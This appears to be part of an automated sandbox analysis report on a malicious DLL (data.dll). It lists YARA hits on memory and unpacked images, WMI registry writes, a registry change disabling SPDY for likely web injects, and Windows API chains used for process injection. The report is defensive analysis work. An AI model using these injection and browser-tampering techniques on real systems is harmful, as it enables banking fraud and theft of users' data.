                      Source: Yara matchFile source: Process Memory Space: cmd.exe PID: 1260, type: MEMORYSTR
                      Source: Yara matchFile source: 0.3.loaddll32.exe.3978d40.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.5488d40.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.5488d40.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.53da4a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.53da4a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.54594a0.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.loaddll32.exe.38ca4a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.loaddll32.exe.39494a0.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.loaddll32.exe.38ca4a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000022.00000000.912908766.0000000000920000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002E.00000002.1184353403.000001B4FABB1000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002D.00000000.973903195.000002D2D67C0000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000030.00000000.1056728839.000001DA4C260000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002D.00000000.971901239.000002D2D67C0000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002D.00000002.977715932.000002D2D67C1000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000000.915124168.0000000000920000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001C.00000000.960999590.0000000006BD1000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.831743156.0000000005459000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000002.1186234366.0000027D4F801000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000030.00000002.1182359593.000001DA4C261000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002E.00000000.1013485765.000001B4FABB0000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000000.985513376.0000027D4F800000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.825194509.00000000038CA000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002E.00000000.1018879466.000001B4FABB0000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001C.00000000.960496675.0000000006AD1000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000030.00000000.1049623811.000001DA4C260000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000002.977139805.0000000000921000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000000.976843830.0000027D4F800000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001C.00000000.952939817.0000000006BD1000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.831611672.00000000053DA000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002D.00000000.975140453.000002D2D67C0000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002E.00000000.1024534203.000001B4FABB0000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000000.911103239.0000000000920000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000000.970866897.0000027D4F800000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.950497075.000000000515F000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.1028966230.0000029E58B09000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000030.00000000.1045657858.000001DA4C260000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.825244038.0000000003949000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1182006594.000000000364F000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.1004101775.0000026452371000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0.3.loaddll32.exe.10d8cd6.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.dd0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.5d0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.30a94a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.rundll32.exe.4f694a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.db8cd6.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.49594a0.11.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.rundll32.exe.ef8cd6.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.30a94a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.49594a0.11.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.5a8cd6.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.6e4b0000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.rundll32.exe.d88cd6.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.4a70000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.rundll32.exe.4f694a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000002.00000003.775929004.0000000000DB0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.928533475.0000000004959000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1181853805.00000000030A9000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.797262385.0000000000EF0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.776223175.00000000005A0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.798115453.00000000010D0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.833489958.0000000004F69000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.786707655.0000000000D80000.00000040.00000001.sdmp, type: MEMORY
                      Disables SPDY (HTTP compression, likely to perform web injects)Show sources
                      Source: C:\Windows\explorer.exeRegistry key value created / modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings EnableSPDY3_0 0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00DD3FAB CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,0_2_00DD3FAB

                      System Summary:

                      barindex
                      Writes or reads registry keys via WMIShow sources
                      Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
                      Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                      Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
                      Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
                      Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Writes registry values via WMIShow sources
                      Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                      Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4B22740_2_6E4B2274
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00DD26540_2_00DD2654
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00DD7E300_2_00DD7E30
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00DD4FA70_2_00DD4FA7
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_04572C070_2_04572C07
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_045724990_2_04572499
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_045655180_2_04565518
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0456AD2E0_2_0456AD2E
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0457C5F40_2_0457C5F4
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_045746580_2_04574658
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0456279B0_2_0456279B
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_045788BB0_2_045788BB
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0456E9BD0_2_0456E9BD
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_04564AFE0_2_04564AFE
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_045852A00_2_045852A0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_045823390_2_04582339
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04BB24993_2_04BB2499
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04BB2C073_2_04BB2C07
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04BBC5F43_2_04BBC5F4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04BAAD2E3_2_04BAAD2E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04BA55183_2_04BA5518
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04BB46583_2_04BB4658
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04BA279B3_2_04BA279B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04BB88BB3_2_04BB88BB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04BAE9BD3_2_04BAE9BD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04BC52A03_2_04BC52A0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04BA4AFE3_2_04BA4AFE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04BC23393_2_04BC2339
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_04A77E305_2_04A77E30
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_04A726545_2_04A72654
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_04A74FA75_2_04A74FA7
                      Source: C:\Windows\System32\control.exeCode function: 34_2_0093F2F034_2_0093F2F0
                      Source: C:\Windows\System32\control.exeCode function: 34_2_0093B53034_2_0093B530
                      Source: C:\Windows\System32\control.exeCode function: 34_2_0093179C34_2_0093179C
                      Source: C:\Windows\System32\control.exeCode function: 34_2_0094508C34_2_0094508C
                      Source: C:\Windows\System32\control.exeCode function: 34_2_009340B434_2_009340B4
                      Source: C:\Windows\System32\control.exeCode function: 34_2_0094E0CF34_2_0094E0CF
                      Source: C:\Windows\System32\control.exeCode function: 34_2_0092380434_2_00923804
                      Source: C:\Windows\System32\control.exeCode function: 34_2_0092E00834_2_0092E008
                      Source: C:\Windows\System32\control.exeCode function: 34_2_0093783434_2_00937834
                      Source: C:\Windows\System32\control.exeCode function: 34_2_0094C87434_2_0094C874
                      Source: C:\Windows\System32\control.exeCode function: 34_2_0092907434_2_00929074
                      Source: C:\Windows\System32\control.exeCode function: 34_2_0093307434_2_00933074
                      Source: C:\Windows\System32\control.exeCode function: 34_2_0094498834_2_00944988
                      Source: C:\Windows\System32\control.exeCode function: 34_2_009459A834_2_009459A8
                      Source: C:\Windows\System32\control.exeCode function: 34_2_0093D9AC34_2_0093D9AC
                      Source: C:\Windows\System32\control.exeCode function: 34_2_0093C1D434_2_0093C1D4
                      Source: C:\Windows\System32\control.exeCode function: 34_2_0092B1D834_2_0092B1D8
                      Source: C:\Windows\System32\control.exeCode function: 34_2_0093C9F034_2_0093C9F0
                      Source: C:\Windows\System32\control.exeCode function: 34_2_0093D15034_2_0093D150
                      Source: C:\Windows\System32\control.exeCode function: 34_2_0094D2DC34_2_0094D2DC
                      Source: C:\Windows\System32\control.exeCode function: 34_2_009432EC34_2_009432EC
                      Source: C:\Windows\System32\control.exeCode function: 34_2_0093821834_2_00938218
                      Source: C:\Windows\System32\control.exeCode function: 34_2_0093727834_2_00937278
                      Source: C:\Windows\System32\control.exeCode function: 34_2_0094AA6C34_2_0094AA6C
                      Source: C:\Windows\System32\control.exeCode function: 34_2_00926A6834_2_00926A68
                      Source: C:\Windows\System32\control.exeCode function: 34_2_0093926834_2_00939268
                      Source: C:\Windows\System32\control.exeCode function: 34_2_0094EB1034_2_0094EB10
                      Source: C:\Windows\System32\control.exeCode function: 34_2_00936B1C34_2_00936B1C
                      Source: C:\Windows\System32\control.exeCode function: 34_2_00922B7434_2_00922B74
                      Source: C:\Windows\System32\control.exeCode function: 34_2_009464F434_2_009464F4
                      Source: C:\Windows\System32\control.exeCode function: 34_2_00933C2434_2_00933C24
                      Source: C:\Windows\System32\control.exeCode function: 34_2_0093047434_2_00930474
                      Source: C:\Windows\System32\control.exeCode function: 34_2_0093ED9434_2_0093ED94
                      Source: C:\Windows\System32\control.exeCode function: 34_2_0094DD9C34_2_0094DD9C
                      Source: C:\Windows\System32\control.exeCode function: 34_2_009385CC34_2_009385CC
                      Source: C:\Windows\System32\control.exeCode function: 34_2_00938DF434_2_00938DF4
                      Source: C:\Windows\System32\control.exeCode function: 34_2_0094952434_2_00949524
                      Source: C:\Windows\System32\control.exeCode function: 34_2_00937D4434_2_00937D44
                      Source: C:\Windows\System32\control.exeCode function: 34_2_0093FD6C34_2_0093FD6C
                      Source: C:\Windows\System32\control.exeCode function: 34_2_0092C6F434_2_0092C6F4
                      Source: C:\Windows\System32\control.exeCode function: 34_2_00946E3434_2_00946E34
                      Source: C:\Windows\System32\control.exeCode function: 34_2_0092862834_2_00928628
                      Source: C:\Windows\System32\control.exeCode function: 34_2_0092779C34_2_0092779C
                      Source: C:\Windows\System32\control.exeCode function: 34_2_0093DFB834_2_0093DFB8
                      Source: C:\Windows\System32\control.exeCode function: 34_2_00943F0834_2_00943F08
                      Source: C:\Windows\System32\control.exeCode function: 34_2_0093977034_2_00939770
                      Source: C:\Windows\System32\rundll32.exeCode function: 45_2_000002D2D67DF2F045_2_000002D2D67DF2F0
                      Source: C:\Windows\System32\rundll32.exeCode function: 45_2_000002D2D67DB53045_2_000002D2D67DB530
                      Source: C:\Windows\System32\rundll32.exeCode function: 45_2_000002D2D67C6A6845_2_000002D2D67C6A68
                      Source: C:\Windows\System32\rundll32.exeCode function: 45_2_000002D2D67EEB1045_2_000002D2D67EEB10
                      Source: C:\Windows\System32\rundll32.exeCode function: 45_2_000002D2D67E3F0845_2_000002D2D67E3F08
                      Source: C:\Windows\System32\rundll32.exeCode function: 45_2_000002D2D67CC6F445_2_000002D2D67CC6F4
                      Source: C:\Windows\System32\rundll32.exeCode function: 45_2_000002D2D67E32EC45_2_000002D2D67E32EC
                      Source: C:\Windows\System32\rundll32.exeCode function: 45_2_000002D2D67ED2DC45_2_000002D2D67ED2DC
                      Source: C:\Windows\System32\rundll32.exeCode function: 45_2_000002D2D67C2B7445_2_000002D2D67C2B74
                      Source: C:\Windows\System32\rundll32.exeCode function: 45_2_000002D2D67D977045_2_000002D2D67D9770
                      Source: C:\Windows\System32\rundll32.exeCode function: 45_2_000002D2D67D6B1C45_2_000002D2D67D6B1C
                      Source: C:\Windows\System32\rundll32.exeCode function: 45_2_000002D2D67CE00845_2_000002D2D67CE008
                      Source: C:\Windows\System32\rundll32.exeCode function: 45_2_000002D2D67C380445_2_000002D2D67C3804
                      Source: C:\Windows\System32\rundll32.exeCode function: 45_2_000002D2D67DDFB845_2_000002D2D67DDFB8
                      Source: C:\Windows\System32\rundll32.exeCode function: 45_2_000002D2D67C779C45_2_000002D2D67C779C
                      Source: C:\Windows\System32\rundll32.exeCode function: 45_2_000002D2D67D179C45_2_000002D2D67D179C
                      Source: C:\Windows\System32\rundll32.exeCode function: 45_2_000002D2D67E508C45_2_000002D2D67E508C
                      Source: C:\Windows\System32\rundll32.exeCode function: 45_2_000002D2D67EC87445_2_000002D2D67EC874
                      Source: C:\Windows\System32\rundll32.exeCode function: 45_2_000002D2D67C907445_2_000002D2D67C9074
                      Source: C:\Windows\System32\rundll32.exeCode function: 45_2_000002D2D67D307445_2_000002D2D67D3074
                      Source: C:\Windows\System32\rundll32.exeCode function: 45_2_000002D2D67D047445_2_000002D2D67D0474
                      Source: C:\Windows\System32\rundll32.exeCode function: 45_2_000002D2D67D783445_2_000002D2D67D7834
                      Source: C:\Windows\System32\rundll32.exeCode function: 45_2_000002D2D67D3C2445_2_000002D2D67D3C24
                      Source: C:\Windows\System32\rundll32.exeCode function: 45_2_000002D2D67E64F445_2_000002D2D67E64F4
                      Source: C:\Windows\System32\rundll32.exeCode function: 45_2_000002D2D67EE0CF45_2_000002D2D67EE0CF
                      Source: C:\Windows\System32\rundll32.exeCode function: 45_2_000002D2D67D40B445_2_000002D2D67D40B4
                      Source: C:\Windows\System32\rundll32.exeCode function: 45_2_000002D2D67E498845_2_000002D2D67E4988
                      Source: C:\Windows\System32\rundll32.exeCode function: 45_2_000002D2D67DFD6C45_2_000002D2D67DFD6C
                      Source: C:\Windows\System32\rundll32.exeCode function: 45_2_000002D2D67DD15045_2_000002D2D67DD150
                      Source: C:\Windows\System32\rundll32.exeCode function: 45_2_000002D2D67D7D4445_2_000002D2D67D7D44
                      Source: C:\Windows\System32\rundll32.exeCode function: 45_2_000002D2D67E952445_2_000002D2D67E9524
                      Source: C:\Windows\System32\rundll32.exeCode function: 45_2_000002D2D67D8DF445_2_000002D2D67D8DF4
                      Source: C:\Windows\System32\rundll32.exeCode function: 45_2_000002D2D67DC9F045_2_000002D2D67DC9F0
                      Source: C:\Windows\System32\rundll32.exeCode function: 45_2_000002D2D67CB1D845_2_000002D2D67CB1D8
                      Source: C:\Windows\System32\rundll32.exeCode function: 45_2_000002D2D67DC1D445_2_000002D2D67DC1D4
                      Source: C:\Windows\System32\rundll32.exeCode function: 45_2_000002D2D67D85CC45_2_000002D2D67D85CC
                      Source: C:\Windows\System32\rundll32.exeCode function: 45_2_000002D2D67DD9AC45_2_000002D2D67DD9AC
                      Source: C:\Windows\System32\rundll32.exeCode function: 45_2_000002D2D67E59A845_2_000002D2D67E59A8
                      Source: C:\Windows\System32\rundll32.exeCode function: 45_2_000002D2D67EDD9C45_2_000002D2D67EDD9C
                      Source: C:\Windows\System32\rundll32.exeCode function: 45_2_000002D2D67DED9445_2_000002D2D67DED94
                      Source: C:\Windows\System32\rundll32.exeCode function: 45_2_000002D2D67D727845_2_000002D2D67D7278
                      Source: C:\Windows\System32\rundll32.exeCode function: 45_2_000002D2D67EAA6C45_2_000002D2D67EAA6C
                      Source: C:\Windows\System32\rundll32.exeCode function: 45_2_000002D2D67D926845_2_000002D2D67D9268
                      Source: C:\Windows\System32\rundll32.exeCode function: 45_2_000002D2D67E6E3445_2_000002D2D67E6E34
                      Source: C:\Windows\System32\rundll32.exeCode function: 45_2_000002D2D67C862845_2_000002D2D67C8628
                      Source: C:\Windows\System32\rundll32.exeCode function: 45_2_000002D2D67D821845_2_000002D2D67D8218
                      Source: C:\Windows\SysWOW64\cmd.exeCode function: 49_2_009788BB49_2_009788BB
                      Source: C:\Windows\SysWOW64\cmd.exeCode function: 49_2_0096E9BD49_2_0096E9BD
                      Source: C:\Windows\SysWOW64\cmd.exeCode function: 49_2_009852A049_2_009852A0
                      Source: C:\Windows\SysWOW64\cmd.exeCode function: 49_2_00964AFE49_2_00964AFE
                      Source: C:\Windows\SysWOW64\cmd.exeCode function: 49_2_0098233949_2_00982339
                      Source: C:\Windows\SysWOW64\cmd.exeCode function: 49_2_0097249949_2_00972499
                      Source: C:\Windows\SysWOW64\cmd.exeCode function: 49_2_00972C0749_2_00972C07
                      Source: C:\Windows\SysWOW64\cmd.exeCode function: 49_2_0097C5F449_2_0097C5F4
                      Source: C:\Windows\SysWOW64\cmd.exeCode function: 49_2_0096551849_2_00965518
                      Source: C:\Windows\SysWOW64\cmd.exeCode function: 49_2_0096AD2E49_2_0096AD2E
                      Source: C:\Windows\SysWOW64\cmd.exeCode function: 49_2_0097465849_2_00974658
                      Source: C:\Windows\SysWOW64\cmd.exeCode function: 49_2_0096279B49_2_0096279B
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0456D1F8 CreateProcessAsUserW,0_2_0456D1F8
                      Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
                      Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: mspdb140.dllJump to behavior
                      Source: data.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4B121F NtMapViewOfSection,0_2_6E4B121F
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4B1A1C SetThreadPriority,NtQuerySystemInformation,Sleep,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError,0_2_6E4B1A1C
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4B2013 GetProcAddress,NtCreateSection,memset,0_2_6E4B2013
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4B2495 NtQueryVirtualMemory,0_2_6E4B2495
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00DD22EC NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,0_2_00DD22EC
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00DD3C64 GetProcAddress,NtCreateSection,memset,0_2_00DD3C64
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00DD37E0 NtMapViewOfSection,0_2_00DD37E0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00DD8055 NtQueryVirtualMemory,0_2_00DD8055
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0456DE77 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,0_2_0456DE77
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_04566EB0 NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64,0_2_04566EB0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_04567FDD RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,memcpy,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA,0_2_04567FDD
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_04570FA5 NtQueryInformationProcess,0_2_04570FA5
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_045692F3 GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA,0_2_045692F3
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_04575AED memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64,0_2_04575AED
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_04561305 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread,0_2_04561305
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_04577419 NtQueryInformationThread,GetLastError,RtlNtStatusToDosError,0_2_04577419
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0457A42B NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError,0_2_0457A42B
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_045736C0 NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW,0_2_045736C0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_04576F70 NtQuerySystemInformation,RtlNtStatusToDosError,0_2_04576F70
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_04564851 memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError,0_2_04564851
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0456D812 OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle,0_2_0456D812
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0456D00C memset,NtQueryInformationProcess,0_2_0456D00C
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_04564173 NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError,0_2_04564173
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_04579180 NtGetContextThread,RtlNtStatusToDosError,0_2_04579180
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0457DBCE NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError,0_2_0457DBCE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04BBA42B NtWriteVirtualMemory,NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError,3_2_04BBA42B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04BA6EB0 NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64,3_2_04BA6EB0
